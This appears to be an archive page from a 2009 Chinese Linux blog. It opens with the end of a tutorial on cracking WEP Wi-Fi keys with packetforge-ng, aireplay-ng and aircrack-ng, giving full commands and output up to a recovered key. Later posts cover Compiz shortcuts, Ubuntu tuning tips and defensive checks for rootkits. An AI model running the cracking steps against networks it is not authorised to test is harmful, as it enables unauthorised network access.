reading from file replay_dec-0413-220624.cap, link-type IEEE802_11 (802.11)
22:06:24.530668 DA:ff:ff:ff:ff:ff:ff BSSID:00:0f:b5:79:04:98 SA:00:0f:b5:79:04:98 LLC, dsap SNAP (0xaa) Individual, ssap SNAP (0xaa) Command, ctrl 0x03: oui Ethernet (0x000000), ethertype ARP (0x0806): arp who-has 192.168.0.101 tell 192.168.0.1

构造注入包
root@mickey:/home/mickey# packetforge-ng -0 -a 00:1D:0F:72:A0:3C -h 00:1C:BF:6A:E1:E9 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0204-000647.xor -w fvck.cap
Wrote packet to: fvck.cap

同时进行Interactive Attack攻击

fukai@fukai-laptop:~$ sudo packetforge-ng -0 -a 00:0f:b5:79:04:98 -h 00:21:5d:90:e9:0a -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0413-220624.xor -w fvck.cap
Wrote packet to: fvck.cap
fukai@fukai-laptop:~$ sudo aireplay-ng -2 -r fvck.cap mon0
No source MAC (-h) specified. Using the device MAC (00:21:5D:90:E9:0A)

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:0F:B5:79:04:98
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:21:5D:90:E9:0A

0x0000: 0841 0201 000f b579 0498 0021 5d90 e90a .A.....y...!]...
0x0010: ffff ffff ffff 8001 6772 0400 6e0c 067f ........gr..n..
0x0020: 7cf4 e8fe ff12 31f1 261c 03f3 5e7e 0c42 |.....1.&...^~.B
0x0030: d78d 2401 035c 14f0 6f62 7d0b f619 6219 ..$..\..ob}...b.
0x0040: e060 df45 .`.E

Use this packet ? y

Saving chosen packet in replay_src-0413-220845.cap
You should also start airodump-ng to capture replies.

End of file.

破解
fukai@fukai-laptop:~$ sudo aircrack-ng *.ivs
Aircrack-ng 1.0 rc3

[00:00:02] Tested 296 keys (got 15985 IVs)

KB depth byte(vote)
0 5/ 6 01(20224) 00(19968) 61(19968) 06(19712) 7B(19712)
1 3/ 5 0F(20736) 24(20480) 99(20480) CD(20480) 0D(20224)
2 0/ 2 45(23040) 17(22272) 41(20992) B2(20992) 52(20736)
3 0/ 1 67(25600) 3E(20992) B3(20992) 57(20224) 76(20224)
4 4/ 5 89(20480) 82(20224) 4B(19968) 81(19968) E6(19712)

KEY FOUND! [ 01:23:45:67:89 ]
Decrypted correctly: 100%


扶凯[http://www.php-oa.com]

本文链接: http://www.php-oa.com/2009/04/16/ubuntu-airmon-ng.html

2009年4月30日星期四

Compiz Fusion 中部分常用的键盘快捷键



以下为 Compiz Fusion 中常用的键盘快捷键,它们要在 CompizConfig Settings Manager 中开启与之相映的特效才有效。

SUPER+SHIFT+DRAG LEFT MOUSE = 火焰的特效

SUPER+SHIFT+C = 关闭火焰的特效

CTRL+ALT+DRAG LEFT MOUSE = 旋转立方体

CTRL+ALT+LEFT ARROW = 旋转立方体

CTRL+ALT+DOWN ARROW = flat desktop

SHIFT+ALT+UP = initiate window picker

CTRL+ALT+DOWN = 展开立方体

ALT+TAB = 窗口切换

SUPER+TAB = flip switcher or ring switcher, depending on which is enabled.

ALT+F7 = initiate ‘move windows’

SHIFT+F9 = 水波特效

SHIFT+F10 = slow animations

CTRL+ALT+D = 显示桌面

For Grouping and Tabbing:

SUPER+S = select single window

SUPER+T = tab group

SUPER+Left = change left tab

SUPER+Right = change right tab

SUPER+G = group windows

SUPER+U = ungroup windows

SUPER+R = remove group window

SUPER+C = close group

SUPER+X = ignore group

Hold the SUPER button then select the windows you want to group and then hit SUPER+G.

在大多数的键盘上"SUPER"就是"Windows"键,也就印着Windows图标的那个键.


Ubuntu操作系统优化技巧分享


  1:并行启动程序:
  这将会使启动程序并行,加速启动过程,代码: sudo nano /etc/init.d/rc
  (注意:这里用 gedit 打开可能是乱码,换个编辑器,如 nano,vi 什么的就 ok 了)找到并修改该行:
  CONCURRENCY=none
  为:
  CONCURRENCY=shell

  2:交换分区使用:
  Ubuntu 默认的 vm.swappiness 值是 60,这一默认值已经很合适了。但你可以改小一些降低swap 的加载,系统性能会有一点点的提升
  输入代码:
  sysctl -q vm.swappiness
  你会看到值是 60, 更改:
  代码:
  sudo sysctl vm.swappiness=10
  这样你就将值由 60 改为 10,这可以大大降低系统对于 swap 的写入,建议内存为512m 或更多的朋友采用此方法。如你你发现你对于 swap 的使用极少,可以将值设为 0。这并不会禁止你对 swap 的使用,而是使你的系统对于 swap 的写入尽可能的少,同时尽可能多的使用你的实际内存。这对于你在切换应用程序时有着巨大的作用,因为这样的话它们是在物理内存而非swap 分区中。
  如果你想永久得改变这一值,你需要更改 sysctl.conf 文件:
  代码:
  sudo gedit /etc/sysctl.conf
  添加:
  vm.swappiness=10
  到末行,需要重启生效。
  小贴士:
  1G 内存推荐值为 5
  2G 内存推荐值为 3
  不推荐把值设为 0

  3:虚拟分区--使用 tmpfs 缓存你的文件:
  通过 tmpfs 可以从你的内存中分出一部分作为虚拟的缓冲硬盘,来加速文件的读写。
  1.此方法推荐 1G 及以上内存用户尝试,1G 内存以下用户慎用
  2.当出现“/tmp 容量不够”的提示,请加内存或不要使用本优化方法:)
  编辑/etc/fstab 文件,加入以下语句:
  tmpfs /tmp tmpfs mode=1777 0 0
  保存后重启系统,系统就会自动把你一半的物理内存用于/tmp,只要是在/tmp 读写的文件,相当于直接读写内存,从而减少硬盘读写的次数。
  这个优化方法对于经常读写硬盘的程序有比较好的优化效果,像电驴,bt 等软件,还
  有网页的缓存都可以利用虚拟后/tmp 来减少对硬盘的读写
  如果想严格控制物理内存的大小,语句可以改成:
  tmpfs /tmp tmpfs size=100m,mode=1777 0 0
  这里 size=100m 就是说让系统从物理内存中划出 100mb 作为虚拟的/tmp,但要小心的是用 size 指定的大小数值不要超过物理内存的一半,否则系统可能会反而变慢。
  如果不加 size 语句,而/tmp 文件容量已经超过物理内存的一半后,它会继续将swap分区作为虚拟/tmp 直到 swap 满为止。因此要让此优化方法发挥最好的性能,则应该让/tmp的数据容量小于物理内存的一半
  注意:当系统重启后 /tmp 里面的文档将会消失,所以在关闭系统前请做好/tmp 里面有用文件的备份工作

  4:关闭系统启动时检查分区的功能,加快系统启动速度
  在终端输入命令: sudo gedit /etc/fstab,找到以下所有类似的语句:
  # /dev/sda6
  UUID=5342-DSEF /media/sda6
  vfat utf8,umask=007,gid=46 0
  把最后那个 1 改为 0,
  # /dev/sda6
  UUID=5452-DF4E /media/sda6 vfat utf8,umask=007,gid=46 0
  保存后,以后启动系统就不会再检查这个分区。
  建议根分区保留检查功能,其余分区检查功能可以关闭

2009年4月29日星期三

10个你也许不知道的Ubuntu技巧

1.打开超级用户权限的运行程序对话框

你也许已经知道用Alt+F2来打开”运行程序”对话框,然后可以输入任何命令行运行之。如果你在终端窗口中输入gksu命令,则会弹出一个类似的对话框,但是运行的程序都是在root级权限。你可以通过System->Preferences-> Keyboard Shortcuts,,将这个命令与键盘快捷键(如Shift+Alt+F2)绑定,可以更加方便的使用这一功能。

2. 使用GDebi来安装包

笔者很长一段时间都没注意到GDebi这个程序,这是一个用于安装你自己手动下载的包的GUI程序。它会根据软件仓库这一实用的特性,来解算依赖关系。很多人也许和笔者一样,用传统的dpkg命令来实现。有一天笔者发现,GDebi也可以命令行模式运行(sudo gdebi package.deb),其功能和GUI模式下完全一样。尝试一下这个命令,也许你再也不想用dpkg –i了。

3. CD命令技巧

笔者确信甚至很多命令行专家也会偶尔发现一些自己以前没意识到的技巧。最近笔者发现了两个以前被忽略的CD命令的技巧,输入cd命令而不带任何参数,可以直接切换到/home目录(等效于cd ~),输入cd –则可以切换到你浏览的上一个目录。

4. 使用PUSHD将目录添加到目录栈

首先来说明一下目录栈是什么,很简单,就是bash存储的一个目录列表。当前浏览的目录总是在列表的顶端,但如果你不通过PUSHD往其中添加目录,这个列表则是空的。举例说明,使用 pushd /usr/bin命令会添加/usr/bin目录到列表,同时会切换到这个目录(加上-n参数可以停留在当前目录不跳转)。使用popd则会删除最顶端的目录,然后跳转到列表中的下一个目录。尝试一下这个命令,当你在管理系统时需要在不同目录之间跳转时或者容易忘记重要东西的位置时,它可能会相当有用。

5. 使用PKILL快速杀掉进程

笔者经常使用top、kill或killall进程加上ps | aux查找进程号/进程名来杀掉进程。但是pkill命令则可去掉大量的工作,pkill firefox就可以杀掉进程列表中所有与firefox符合的incheng。Pstree也是一个很酷的命令,它会根据所有关系以家庭树的方式显示所有进程。

6.使用Gnome中心自定义Gnome

对于那些难于放弃窗口界面,希望能获得类似控制面板界面体验的用户,可以考虑使用gnome-control-center来实现系统配置。在桌面上添加快捷方式,可以使新手获得类似Windows的体验,避免迷失在复杂的系统菜单中。

7. 加速OpenOffice.org的启动

如果你经常使用OpenOffice.org,你可能会被它漫长的启动时间所囧到。要解决这个问题,打开会话程序(在Jaunty中被称为启动项管理,反正你总能在System->Preferences->Startup Applications中找到),然后新增一项。在命令行中输入openoffice -nodefault –nologo,重启后,OpenOffice会在Gnome桌面启动的时候缓存,再次启动任何OpenOffice程序时就会很快完成。

8.快速清理磁盘垃圾

磁盘空间又不够用了?尝试在终端窗口中输入sudo apt-get autoremove然后输入sudo apt-get clean,前一个命令会卸载系统中所有未被使用的依赖关系,后一个命令会清除所有缓存的包文件,两者都是无害的。在一个升级过多次的系统上,你也许能通过这个方法清理出若干GB的空间。

9. 找出丢失的文件扩展名

如果你收到一个没有扩展名的email附件,不知道是什么类型时(苹果用户经常把文件扩展名忽略),试一下file命令,直接加上文件名。同时也可以试一下strings命令,会显示出二进制文件中任何可显示的字符串,文件的类型通常就会在前面几行,所以用管道把这个命令和head连接起来是个好办法。

10.不要忘了这些手册页面

看一下这些有趣的但是不是广为人知的手册页面:intro 初学者的命令行指导; hier 文件系统的介绍; built-ins 各种没有自带说明的命令的迷你手册。

2009年4月28日星期二

检测Linux系统是否被黑的技巧-zt

俗称“脚本小鬼”的家伙 是属于那种很糟糕的黑客,因为基本上他们中的许多和大多数人都是如此的没有技巧。可以这样说,如果你安装了所有正确的补丁,拥有经过测试的防火墙,并且在 多个级别都激活了先进的入侵检测系统,那么只有在一种情况下你才会被黑,那就是,你太懒了以至没去做该做的事情,例如,安装BIND的最新补丁。

一不留神而被黑确实让人感到为难,更严重的是某些脚本小鬼还会下载一些众所周知的“root kits”或者流行的刺探工具,这些都占用了你的CPU,存储器,数据和带宽。这些坏人是从那里开始着手的呢?这就要从root kit开始说起。

一个root kit其实就是一个软件包,黑客利用它来提供给自己对你的机器具有root级别的访问权限。一旦这个黑客能够以root的身份访问你的机器,一切都完了。 唯一可以做就是用最快的效率备份你的数据,清理硬盘,然后重新安装操作系统。无论如何,一旦你的机器被某人接管了要想恢复并不是一件轻而易举的事情。

你能信任你的ps命令吗?

找出root kit的首个窍门是运行ps命令。有可能对你来说一切都看来很正常。图示是一个ps命令输出的例子。真正的问题是,“真的一切都正常吗?”黑客常用的一个 诡计就是把ps命令替换掉,而这个替换上的ps将不会显示那些正在你的机器上运行的非法程序。为了测试个,应该检查你的ps文件的大小,它通常位于 /bin/ps。在我们的Linux机器里它大概有60kB。我最近遇到一个被root kit替换的ps程序,这个东西只有大约12kB的大小。

另一个明显的骗局是把root的命令历史记录文件链接到/dev/null。这个命令历史记录文件是用来跟踪和记录一个用户在登录上一台Linux机器后所用过的命令的。黑客们把你的历史纪录文件重定向到/dev/null的目的在于使你不能看到他们曾经输入过的命令。

你可以通过在shell提示符下敲入history来访问你的历史记录文件。假如你发现自己 正在使用history命令,而它并没有出现在之前使用过的命令列表里,你要看一看你的~/.bash_history 文件。假如这个文件是空的,就执行一个ls -l ~/.bash_history命令。在你执行了上述的命令后你将看到类似以下的输出:

-rw------- 1 jd jd 13829 Oct 10 17:06 /home/jd/.bash_history

又或者,你可能会看到类似以下的输出:

lrwxrwxrwx 1 jd jd 9 Oct 10 19:40 /home/jd/.bash_history -> /dev/null

假如你看到的是第二种,就表明这个 .bash_history 文件已经被重定向到/dev/null。这是一个致命的信息,现在就立即把你的机器从Internet上断掉,尽可能备份你的数据,并且开始重新安装系统。

寻找未知的用户账号

在你打算对你的Linux机器做一次检测的时候,首先检查是否有未知的用户账号无疑是明智的。在下一次你登录到你的Linux机器时,敲入以下的命令:

grep :x:0: /etc/passwd

只有一行,我再强调一遍,在一个标准的Linux安装里,grep命令应该只返回一行,类似以下:

root:x:0:0:root:/root:/bin/bash

假如在敲入之前的grep命令后你的系统返回的结果不止一行,那可能就有问题了。应该只有一个用户的UID为0,而如果grep命令的返回结果超过一行,那就表示不止一个用户。

认真来说,虽然对于发现黑客行为,以上都是一些很好的基本方法。但这些技巧本身并不能构成足够的安全性,而且其深度和广度和在文章头提到的入侵检测系统比起来也差得远。

2009年4月26日星期日

找回ubuntu9.04无敌三键

在ubuntu9.04之前随时可以用ctrl+alt+退格键杀掉X,非常方便,但是出于安全考虑9.04关闭了这个默认功能。

对于我来说,它是不可少的,所以我用下面的命令找回:
sudo apt-get install dontzap
sudo dontzap -d

重启,OK